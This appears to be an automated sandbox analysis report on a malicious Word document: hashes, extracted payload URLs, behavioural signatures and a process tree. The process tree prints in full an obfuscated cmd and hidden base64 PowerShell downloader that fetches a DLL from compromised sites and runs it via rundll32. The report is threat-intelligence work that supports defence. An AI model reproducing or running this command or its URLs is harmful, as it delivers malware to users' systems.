Analysis
-
max time kernel
139s -
max time network
139s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
13-01-2021 13:42
Static task
static1
Behavioral task
behavioral1
Sample
0717eeb278ee42735001408147062d6fb92f5fe6fcb9b90231b3fe79b6ffee1f.doc
Resource
win7v20201028
Behavioral task
behavioral2
Sample
0717eeb278ee42735001408147062d6fb92f5fe6fcb9b90231b3fe79b6ffee1f.doc
Resource
win10v20201028
General
-
Target
0717eeb278ee42735001408147062d6fb92f5fe6fcb9b90231b3fe79b6ffee1f.doc
-
Size
158KB
-
MD5
97a4cbc590b64fcb705316e7442438ea
-
SHA1
6786718e802b4ee95a7bc3fcb96a6e20ec84b812
-
SHA256
0717eeb278ee42735001408147062d6fb92f5fe6fcb9b90231b3fe79b6ffee1f
-
SHA512
4713d1c32f78542eb213425485809075145ccc36f6a198c40f9534d6d6c7e65acd936bcfa717a501f14999946e1a6df84bdc91d6589609fc7e304bddde795d26
Malware Config
Extracted
http://fynart.com/wp-admin/aNuMy/
http://dermedicoclinic.com/js/NElI8ZC/
http://geolifesciences.com/font/r/
http://rollinghood.com/how-to-ifwed/buj6VQx/
http://jardindhelena.com/wp-content/u20/
http://kingshowworldshoppingmall.com/cgi-bin/Ga/
http://davinciworldshoppingmall.com/cgi-bin/Eh/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1384 732 cmd.exe -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exerundll32.exeflow pid process 23 1324 powershell.exe 29 2676 rundll32.exe -
Loads dropped DLL 1 IoCs
Processes:
rundll32.exepid process 3532 rundll32.exe -
Drops file in System32 directory 1 IoCs
Processes:
rundll32.exedescription ioc process File opened for modification C:\Windows\SysWOW64\Nsefaxwokeff\nvpedhlctjf.pcn rundll32.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 3336 WINWORD.EXE 3336 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 7 IoCs
Processes:
powershell.exerundll32.exepid process 1324 powershell.exe 1324 powershell.exe 1324 powershell.exe 2676 rundll32.exe 2676 rundll32.exe 2676 rundll32.exe 2676 rundll32.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1324 powershell.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
Processes:
WINWORD.EXEpid process 3336 WINWORD.EXE 3336 WINWORD.EXE 3336 WINWORD.EXE 3336 WINWORD.EXE 3336 WINWORD.EXE 3336 WINWORD.EXE 3336 WINWORD.EXE -
Suspicious use of WriteProcessMemory 12 IoCs
Processes:
cmd.exepowershell.exerundll32.exerundll32.exedescription pid process target process PID 1384 wrote to memory of 412 1384 cmd.exe msg.exe PID 1384 wrote to memory of 412 1384 cmd.exe msg.exe PID 1384 wrote to memory of 1324 1384 cmd.exe powershell.exe PID 1384 wrote to memory of 1324 1384 cmd.exe powershell.exe PID 1324 wrote to memory of 2252 1324 powershell.exe rundll32.exe PID 1324 wrote to memory of 2252 1324 powershell.exe rundll32.exe PID 2252 wrote to memory of 3532 2252 rundll32.exe rundll32.exe PID 2252 wrote to memory of 3532 2252 rundll32.exe rundll32.exe PID 2252 wrote to memory of 3532 2252 rundll32.exe rundll32.exe PID 3532 wrote to memory of 2676 3532 rundll32.exe rundll32.exe PID 3532 wrote to memory of 2676 3532 rundll32.exe rundll32.exe PID 3532 wrote to memory of 2676 3532 rundll32.exe rundll32.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\0717eeb278ee42735001408147062d6fb92f5fe6fcb9b90231b3fe79b6ffee1f.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:3336
-
C:\Windows\system32\cmd.execmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAkAEYATQBYACAAIAA9ACAAIABbAHQAeQBQAEUAXQAoACIAewAxAH0AewAzAH0AewAyAH0AewAwAH0AewA0AH0AIgAtAEYAIAAnAE8ALgAnACwAJwBTAFkAcwB0ACcALAAnAC4AaQAnACwAJwBFAG0AJwAsACcAZABJAHIAZQBjAFQATwByAHkAJwApACAAOwAgACQAaQBzAG8AZgBlAFcAPQAgACAAWwBUAFkAcABlAF0AKAAiAHsANAB9AHsAMQB9AHsAMAB9AHsAMwB9AHsANQB9AHsANgB9AHsAOAB9AHsAMgB9AHsANwB9ACIAIAAtAEYAJwBlAE0ALgAnACwAJwBTAFQAJwAsACcASQBuAFQATQBBACcALAAnAE4ARQB0AC4AJwAsACcAUwB5ACcALAAnAFMARQAnACwAJwBSAFYASQAnACwAJwBuAGEAZwBlAHIAJwAsACcAQwBlAHAATwAnACkAIAA7ACAAIAAkAEUANgBjAGIAMgA2AGUAPQAkAFAANQA4AEEAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAFIAMgA1AE0AOwAkAEcAMQAxAFUAPQAoACcARwA3ACcAKwAnADEAVAAnACkAOwAgACgAIABnAGUAVAAtAHYAQQByAGkAQQBiAGwAZQAgAGYAbQBYACAAIAAtAFYAYQBsAHUAZQBvACAAIAApADoAOgAiAGMAUgBgAEUAQQBUAEUAZABJAGAAUgBFAGAAYwBgAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAHkAVQAnACsAJwBYAEUANgBuAHgAMwAnACsAJwA4ADUAJwApACsAKAAnAHkAJwArACcAVQBYACcAKQArACgAJwBBAGgAagAnACsAJwAyAHYAJwApACsAJwB4ACcAKwAnAG4AeQAnACsAJwBVACcAKwAnAFgAJwApAC4AIgByAEUAYABQAGwAYQBjAGUAIgAoACgAWwBjAGgAQQBSAF0AMQAyADEAKwBbAGMAaABBAFIAXQA4ADUAKwBbAGMAaABBAFIAXQA4ADgAKQAsACcAXAAnACkAKQApADsAJABEAF8AMwBNAD0AKAAoACcAQwAnACsAJwBfADcAJwApACsAJwBHACcAKQA7ACAAIAAoACAAIABWAGEAcgBJAGEAQgBsAGUAIAAoACcASQBTAG8AZgAnACsAJwBFAHcAJwApACkALgBWAGEAbABVAEUAOgA6ACIAUwBgAGUAYwB1AFIASQBUAFkAUABSAG8AdABgAE8AQwBgAG8AbAAiACAAPQAgACgAKAAnAFQAJwArACcAbABzACcAKQArACcAMQAyACcAKQA7ACQAVQA2ADYASwA9ACgAKAAnAEgAJwArACcAMwAxACcAKQArACcAVgAnACkAOwAkAEsAMwAyADAAMgBzAF8AIAA9ACAAKAAoACcAVAAnACsAJwBfADIAJwApACsAJwBTACcAKQA7ACQAVAA3ADMARQA9ACgAKAAnAEQANwAnACsAJwAwACcAKQArACcARwAnACkAOwAkAEMAMQBlADgAXwByAHYAPQAkAEgATwBNAEUAKwAoACgAKAAnAEcAJwArACcAagBIACcAKQArACcARQAnACsAKAAnADYAbgB4ADMAOAA1ACcAKwAnAEcAagBIAEEAaABqACcAKwAnADIAdgAnACkAKwAnAHgAJwArACgAJwBuACcAKwAnAEcAagAnACkAKwAnAEgAJwApAC4AIgBSAEUAcABsAGAAQQBgAEMAZQAiACgAKABbAGMAaABhAHIAXQA3ADEAKwBbAGMAaABhAHIAXQAxADAANgArAFsAYwBoAGEAcgBdADcAMgApACwAJwBcACcAKQApACsAJABLADMAMgAwADIAcwBfACsAKAAoACcALgAnACsAJwBkAGwAJwApACsAJwBsACcAKQA7ACQAUQAzADIAQwA9ACgAJwBUADcAJwArACcAMgBGACcAKQA7ACQARABoAHEAYgA1AGIAeAA9ACgAJwBBACcAKwAoACcAXQBbAHEAWwAnACsAJwBEACcAKwAnADoAJwArACcALwAvAGYAeQBuAGEAJwApACsAKAAnAHIAJwArACcAdAAuAGMAbwAnACsAJwBtAC8AJwApACsAKAAnAHcAcAAnACsAJwAtACcAKQArACgAJwBhAGQAJwArACcAbQAnACkAKwAoACcAaQBuACcAKwAnAC8AYQAnACkAKwAoACcATgAnACsAJwB1ACcAKwAnAE0AeQAvAEAAJwArACcAQQBdAFsAcQBbACcAKwAnAEQAOgAnACkAKwAoACcALwAnACsAJwAvAGQAZQAnACkAKwAoACcAcgAnACsAJwBtAGUAZABpAGMAbwBjAGwAaQAnACsAJwBuAGkAJwArACcAYwAuAGMAJwApACsAKAAnAG8AbQAvACcAKwAnAGoAcwAvAE4ARQBsACcAKQArACgAJwBJADgAWgAnACsAJwBDAC8AQABBACcAKQArACgAJwBdAFsAJwArACcAcQAnACkAKwAoACcAWwBEACcAKwAnADoAJwApACsAKAAnAC8AJwArACcALwBnAGUAbwBsAGkAJwApACsAJwBmAGUAJwArACgAJwBzAGMAaQAnACsAJwBlAG4AYwBlAHMALgAnACsAJwBjAG8AJwArACcAbQAnACkAKwAnAC8AJwArACcAZgBvACcAKwAnAG4AJwArACgAJwB0AC8AcgAvAEAAQQAnACsAJwBdAFsAJwArACcAcQAnACkAKwAoACcAWwBEADoALwAvACcAKwAnAHIAbwAnACkAKwAnAGwAbAAnACsAKAAnAGkAJwArACcAbgBnAGgAJwArACcAbwAnACsAJwBvAGQALgBjAG8AbQAvACcAKwAnAGgAbwB3ACcAKQArACgAJwAtACcAKwAnAHQAbwAtAGkAZgB3ACcAKQArACcAZQBkACcAKwAoACcALwBiAHUAagA2ACcAKwAnAFYAJwApACsAKAAnAFEAeAAvAEAAJwArACcAQQBdAFsAcQAnACsAJwBbAEQAOgAvACcAKwAnAC8AJwArACcAagBhACcAKQArACcAcgBkACcAKwAoACcAaQBuAGQAaAAnACsAJwBlAGwAJwArACcAZQAnACkAKwAoACcAbgBhAC4AYwAnACsAJwBvAG0ALwAnACsAJwB3AHAALQAnACkAKwAoACcAYwBvACcAKwAnAG4AJwApACsAJwB0ACcAKwAnAGUAbgAnACsAJwB0ACcAKwAoACcALwB1ACcAKwAnADIAMAAvACcAKQArACcAQAAnACsAKAAnAEEAJwArACcAXQBbACcAKQArACcAcQBbACcAKwAoACcARAA6AC8AJwArACcALwAnACkAKwAoACcAawBpACcAKwAnAG4AJwApACsAJwBnACcAKwAnAHMAJwArACgAJwBoAG8AJwArACcAdwB3AG8AJwApACsAJwByAGwAJwArACgAJwBkACcAKwAnAHMAJwArACcAaABvAHAAcABpAG4AZwAnACkAKwAoACcAbQBhAGwAbAAuAGMAJwArACcAbwAnACkAKwAnAG0AJwArACcALwBjACcAKwAnAGcAJwArACgAJwBpAC0AYgAnACsAJwBpACcAKQArACgAJwBuAC8AJwArACcARwBhAC8AQABBACcAKwAnAF0AWwBxACcAKwAnAFsARAA6ACcAKwAnAC8ALwBkAGEAJwArACcAdgBpAG4AJwApACsAKAAnAGMAaQB3ACcAKwAnAG8AJwArACcAcgBsAGQAcwAnACkAKwAnAGgAbwAnACsAKAAnAHAAcAAnACsAJwBpAG4AJwApACsAKAAnAGcAbQBhAGwAbAAuAGMAJwArACcAbwAnACkAKwAoACcAbQAvACcAKwAnAGMAJwApACsAKAAnAGcAaQAnACsAJwAtAGIAJwApACsAJwBpAG4AJwArACgAJwAvAEUAaAAnACsAJwAvACcAKQApAC4AIgBSAEUAUABMAGAAQQBgAGMARQAiACgAKAAnAEEAXQAnACsAKAAnAFsAcQBbACcAKwAnAEQAJwApACkALAAoAFsAYQByAHIAYQB5AF0AKAAoACgAJwBkACcAKwAnAHMAZQAnACkAKwAnAHcAZgAnACkALAAoACgAJwB3ACcAKwAnAGUAdgB3ACcAKQArACcAZQAnACkAKQAsACgAJwBhAGUAJwArACcAZgBmACcAKQAsACgAJwBoACcAKwAoACcAdAAnACsAJwB0AHAAJwApACkAKQBbADIAXQApAC4AIgBzAFAAYABMAGkAVAAiACgAJABSADcAOABKACAAKwAgACQARQA2AGMAYgAyADYAZQAgACsAIAAkAEEANgAzAEcAKQA7ACQARQA5ADYAVgA9ACgAJwBPADkAJwArACcANQBHACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAWAByAHEAcAA5AGUANQAgAGkAbgAgACQARABoAHEAYgA1AGIAeAApAHsAdAByAHkAewAoACYAKAAnAE4AZQAnACsAJwB3AC0AJwArACcATwBiAGoAZQBjAHQAJwApACAAcwB5AHMAVABFAE0ALgBuAEUAdAAuAFcARQBCAEMATABJAGUAbgBUACkALgAiAEQATwB3AGAATgBsAG8AYABBAGQAZgBpAGAAbABFACIAKAAkAFgAcgBxAHAAOQBlADUALAAgACQAQwAxAGUAOABfAHIAdgApADsAJABHADgAMwBYAD0AKAAoACcAQwAnACsAJwAxAF8AJwApACsAJwBRACcAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAnACsAJwAtAEkAdAAnACsAJwBlAG0AJwApACAAJABDADEAZQA4AF8AcgB2ACkALgAiAGwAYABlAG4AZwB0AEgAIgAgAC0AZwBlACAANAA0ADkANwAzACkAIAB7AC4AKAAnAHIAdQBuACcAKwAnAGQAJwArACcAbABsADMAMgAnACkAIAAkAEMAMQBlADgAXwByAHYALAAoACgAJwBTAGgAbwAnACsAJwB3ACcAKQArACgAJwBEACcAKwAnAGkAYQAnACkAKwAoACcAbAAnACsAJwBvAGcAJwApACsAJwBBACcAKQAuACIAdABgAG8AcwBUAGAAUgBpAG4AZwAiACgAKQA7ACQAVQBfADYAWgA9ACgAJwBYACcAKwAoACcAMAAnACsAJwA1AFoAJwApACkAOwBiAHIAZQBhAGsAOwAkAEoAOAAwAEkAPQAoACgAJwBSADQAJwArACcAXwAnACkAKwAnAFEAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABFADAAMgBBAD0AKAAnAEoAJwArACgAJwA5ACcAKwAnADcAUQAnACkAKQA=1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1384 -
C:\Windows\system32\msg.exemsg Admin /v Word experienced an error trying to open the file.2⤵PID:412
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -w hidden -enc IAAkAEYATQBYACAAIAA9ACAAIABbAHQAeQBQAEUAXQAoACIAewAxAH0AewAzAH0AewAyAH0AewAwAH0AewA0AH0AIgAtAEYAIAAnAE8ALgAnACwAJwBTAFkAcwB0ACcALAAnAC4AaQAnACwAJwBFAG0AJwAsACcAZABJAHIAZQBjAFQATwByAHkAJwApACAAOwAgACQAaQBzAG8AZgBlAFcAPQAgACAAWwBUAFkAcABlAF0AKAAiAHsANAB9AHsAMQB9AHsAMAB9AHsAMwB9AHsANQB9AHsANgB9AHsAOAB9AHsAMgB9AHsANwB9ACIAIAAtAEYAJwBlAE0ALgAnACwAJwBTAFQAJwAsACcASQBuAFQATQBBACcALAAnAE4ARQB0AC4AJwAsACcAUwB5ACcALAAnAFMARQAnACwAJwBSAFYASQAnACwAJwBuAGEAZwBlAHIAJwAsACcAQwBlAHAATwAnACkAIAA7ACAAIAAkAEUANgBjAGIAMgA2AGUAPQAkAFAANQA4AEEAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAFIAMgA1AE0AOwAkAEcAMQAxAFUAPQAoACcARwA3ACcAKwAnADEAVAAnACkAOwAgACgAIABnAGUAVAAtAHYAQQByAGkAQQBiAGwAZQAgAGYAbQBYACAAIAAtAFYAYQBsAHUAZQBvACAAIAApADoAOgAiAGMAUgBgAEUAQQBUAEUAZABJAGAAUgBFAGAAYwBgAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAHkAVQAnACsAJwBYAEUANgBuAHgAMwAnACsAJwA4ADUAJwApACsAKAAnAHkAJwArACcAVQBYACcAKQArACgAJwBBAGgAagAnACsAJwAyAHYAJwApACsAJwB4ACcAKwAnAG4AeQAnACsAJwBVACcAKwAnAFgAJwApAC4AIgByAEUAYABQAGwAYQBjAGUAIgAoACgAWwBjAGgAQQBSAF0AMQAyADEAKwBbAGMAaABBAFIAXQA4ADUAKwBbAGMAaABBAFIAXQA4ADgAKQAsACcAXAAnACkAKQApADsAJABEAF8AMwBNAD0AKAAoACcAQwAnACsAJwBfADcAJwApACsAJwBHACcAKQA7ACAAIAAoACAAIABWAGEAcgBJAGEAQgBsAGUAIAAoACcASQBTAG8AZgAnACsAJwBFAHcAJwApACkALgBWAGEAbABVAEUAOgA6ACIAUwBgAGUAYwB1AFIASQBUAFkAUABSAG8AdABgAE8AQwBgAG8AbAAiACAAPQAgACgAKAAnAFQAJwArACcAbABzACcAKQArACcAMQAyACcAKQA7ACQAVQA2ADYASwA9ACgAKAAnAEgAJwArACcAMwAxACcAKQArACcAVgAnACkAOwAkAEsAMwAyADAAMgBzAF8AIAA9ACAAKAAoACcAVAAnACsAJwBfADIAJwApACsAJwBTACcAKQA7ACQAVAA3ADMARQA9ACgAKAAnAEQANwAnACsAJwAwACcAKQArACcARwAnACkAOwAkAEMAMQBlADgAXwByAHYAPQAkAEgATwBNAEUAKwAoACgAKAAnAEcAJwArACcAagBIACcAKQArACcARQAnACsAKAAnADYAbgB4ADMAOAA1ACcAKwAnAEcAagBIAEEAaABqACcAKwAnADIAdgAnACkAKwAnAHgAJwArACgAJwBuACcAKwAnAEcAagAnACkAKwAnAEgAJwApAC4AIgBSAEUAcABsAGAAQQBgAEMAZQAiACgAKABbAGMAaABhAHIAXQA3ADEAKwBbAGMAaABhAHIAXQAxADAANgArAFsAYwBoAGEAcgBdADcAMgApACwAJwBcACcAKQApACsAJABLADMAMgAwADIAcwBfACsAKAAoACcALgAnACsAJwBkAGwAJwApACsAJwBsACcAKQA7ACQAUQAzADIAQwA9ACgAJwBUADcAJwArACcAMgBGACcAKQA7ACQARABoAHEAYgA1AGIAeAA9ACgAJwBBACcAKwAoACcAXQBbAHEAWwAnACsAJwBEACcAKwAnADoAJwArACcALwAvAGYAeQBuAGEAJwApACsAKAAnAHIAJwArACcAdAAuAGMAbwAnACsAJwBtAC8AJwApACsAKAAnAHcAcAAnACsAJwAtACcAKQArACgAJwBhAGQAJwArACcAbQAnACkAKwAoACcAaQBuACcAKwAnAC8AYQAnACkAKwAoACcATgAnACsAJwB1ACcAKwAnAE0AeQAvAEAAJwArACcAQQBdAFsAcQBbACcAKwAnAEQAOgAnACkAKwAoACcALwAnACsAJwAvAGQAZQAnACkAKwAoACcAcgAnACsAJwBtAGUAZABpAGMAbwBjAGwAaQAnACsAJwBuAGkAJwArACcAYwAuAGMAJwApACsAKAAnAG8AbQAvACcAKwAnAGoAcwAvAE4ARQBsACcAKQArACgAJwBJADgAWgAnACsAJwBDAC8AQABBACcAKQArACgAJwBdAFsAJwArACcAcQAnACkAKwAoACcAWwBEACcAKwAnADoAJwApACsAKAAnAC8AJwArACcALwBnAGUAbwBsAGkAJwApACsAJwBmAGUAJwArACgAJwBzAGMAaQAnACsAJwBlAG4AYwBlAHMALgAnACsAJwBjAG8AJwArACcAbQAnACkAKwAnAC8AJwArACcAZgBvACcAKwAnAG4AJwArACgAJwB0AC8AcgAvAEAAQQAnACsAJwBdAFsAJwArACcAcQAnACkAKwAoACcAWwBEADoALwAvACcAKwAnAHIAbwAnACkAKwAnAGwAbAAnACsAKAAnAGkAJwArACcAbgBnAGgAJwArACcAbwAnACsAJwBvAGQALgBjAG8AbQAvACcAKwAnAGgAbwB3ACcAKQArACgAJwAtACcAKwAnAHQAbwAtAGkAZgB3ACcAKQArACcAZQBkACcAKwAoACcALwBiAHUAagA2ACcAKwAnAFYAJwApACsAKAAnAFEAeAAvAEAAJwArACcAQQBdAFsAcQAnACsAJwBbAEQAOgAvACcAKwAnAC8AJwArACcAagBhACcAKQArACcAcgBkACcAKwAoACcAaQBuAGQAaAAnACsAJwBlAGwAJwArACcAZQAnACkAKwAoACcAbgBhAC4AYwAnACsAJwBvAG0ALwAnACsAJwB3AHAALQAnACkAKwAoACcAYwBvACcAKwAnAG4AJwApACsAJwB0ACcAKwAnAGUAbgAnACsAJwB0ACcAKwAoACcALwB1ACcAKwAnADIAMAAvACcAKQArACcAQAAnACsAKAAnAEEAJwArACcAXQBbACcAKQArACcAcQBbACcAKwAoACcARAA6AC8AJwArACcALwAnACkAKwAoACcAawBpACcAKwAnAG4AJwApACsAJwBnACcAKwAnAHMAJwArACgAJwBoAG8AJwArACcAdwB3AG8AJwApACsAJwByAGwAJwArACgAJwBkACcAKwAnAHMAJwArACcAaABvAHAAcABpAG4AZwAnACkAKwAoACcAbQBhAGwAbAAuAGMAJwArACcAbwAnACkAKwAnAG0AJwArACcALwBjACcAKwAnAGcAJwArACgAJwBpAC0AYgAnACsAJwBpACcAKQArACgAJwBuAC8AJwArACcARwBhAC8AQABBACcAKwAnAF0AWwBxACcAKwAnAFsARAA6ACcAKwAnAC8ALwBkAGEAJwArACcAdgBpAG4AJwApACsAKAAnAGMAaQB3ACcAKwAnAG8AJwArACcAcgBsAGQAcwAnACkAKwAnAGgAbwAnACsAKAAnAHAAcAAnACsAJwBpAG4AJwApACsAKAAnAGcAbQBhAGwAbAAuAGMAJwArACcAbwAnACkAKwAoACcAbQAvACcAKwAnAGMAJwApACsAKAAnAGcAaQAnACsAJwAtAGIAJwApACsAJwBpAG4AJwArACgAJwAvAEUAaAAnACsAJwAvACcAKQApAC4AIgBSAEUAUABMAGAAQQBgAGMARQAiACgAKAAnAEEAXQAnACsAKAAnAFsAcQBbACcAKwAnAEQAJwApACkALAAoAFsAYQByAHIAYQB5AF0AKAAoACgAJwBkACcAKwAnAHMAZQAnACkAKwAnAHcAZgAnACkALAAoACgAJwB3ACcAKwAnAGUAdgB3ACcAKQArACcAZQAnACkAKQAsACgAJwBhAGUAJwArACcAZgBmACcAKQAsACgAJwBoACcAKwAoACcAdAAnACsAJwB0AHAAJwApACkAKQBbADIAXQApAC4AIgBzAFAAYABMAGkAVAAiACgAJABSADcAOABKACAAKwAgACQARQA2AGMAYgAyADYAZQAgACsAIAAkAEEANgAzAEcAKQA7ACQARQA5ADYAVgA9ACgAJwBPADkAJwArACcANQBHACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAWAByAHEAcAA5AGUANQAgAGkAbgAgACQARABoAHEAYgA1AGIAeAApAHsAdAByAHkAewAoACYAKAAnAE4AZQAnACsAJwB3AC0AJwArACcATwBiAGoAZQBjAHQAJwApACAAcwB5AHMAVABFAE0ALgBuAEUAdAAuAFcARQBCAEMATABJAGUAbgBUACkALgAiAEQATwB3AGAATgBsAG8AYABBAGQAZgBpAGAAbABFACIAKAAkAFgAcgBxAHAAOQBlADUALAAgACQAQwAxAGUAOABfAHIAdgApADsAJABHADgAMwBYAD0AKAAoACcAQwAnACsAJwAxAF8AJwApACsAJwBRACcAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAnACsAJwAtAEkAdAAnACsAJwBlAG0AJwApACAAJABDADEAZQA4AF8AcgB2ACkALgAiAGwAYABlAG4AZwB0AEgAIgAgAC0AZwBlACAANAA0ADkANwAzACkAIAB7AC4AKAAnAHIAdQBuACcAKwAnAGQAJwArACcAbABsADMAMgAnACkAIAAkAEMAMQBlADgAXwByAHYALAAoACgAJwBTAGgAbwAnACsAJwB3ACcAKQArACgAJwBEACcAKwAnAGkAYQAnACkAKwAoACcAbAAnACsAJwBvAGcAJwApACsAJwBBACcAKQAuACIAdABgAG8AcwBUAGAAUgBpAG4AZwAiACgAKQA7ACQAVQBfADYAWgA9ACgAJwBYACcAKwAoACcAMAAnACsAJwA1AFoAJwApACkAOwBiAHIAZQBhAGsAOwAkAEoAOAAwAEkAPQAoACgAJwBSADQAJwArACcAXwAnACkAKwAnAFEAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABFADAAMgBBAD0AKAAnAEoAJwArACgAJwA5ACcAKwAnADcAUQAnACkAKQA=2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1324 -
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Users\Admin\E6nx385\Ahj2vxn\T_2S.dll,ShowDialogA3⤵
- Suspicious use of WriteProcessMemory
PID:2252 -
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Users\Admin\E6nx385\Ahj2vxn\T_2S.dll,ShowDialogA4⤵
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:3532 -
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Nsefaxwokeff\nvpedhlctjf.pcn",ShowDialogA5⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
PID:2676
-
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
7465401deca00cb5757231aefdbea357
SHA120281ade710340bf704a3352fecc9c98526c8fae
SHA256ff05668c202f1757a00b6a287b1ee41cae5cea279f8ef706d3076e47f3df6a16
SHA5128cf7d0dcf3d2acffd4be22b81f15114343b6c689d2962c515f1f86d71b7a37e3485d5b7a7d88ca77de6442268f6baac5021c6fc7a9d72167139ad655f07f810b
-
MD5
7465401deca00cb5757231aefdbea357
SHA120281ade710340bf704a3352fecc9c98526c8fae
SHA256ff05668c202f1757a00b6a287b1ee41cae5cea279f8ef706d3076e47f3df6a16
SHA5128cf7d0dcf3d2acffd4be22b81f15114343b6c689d2962c515f1f86d71b7a37e3485d5b7a7d88ca77de6442268f6baac5021c6fc7a9d72167139ad655f07f810b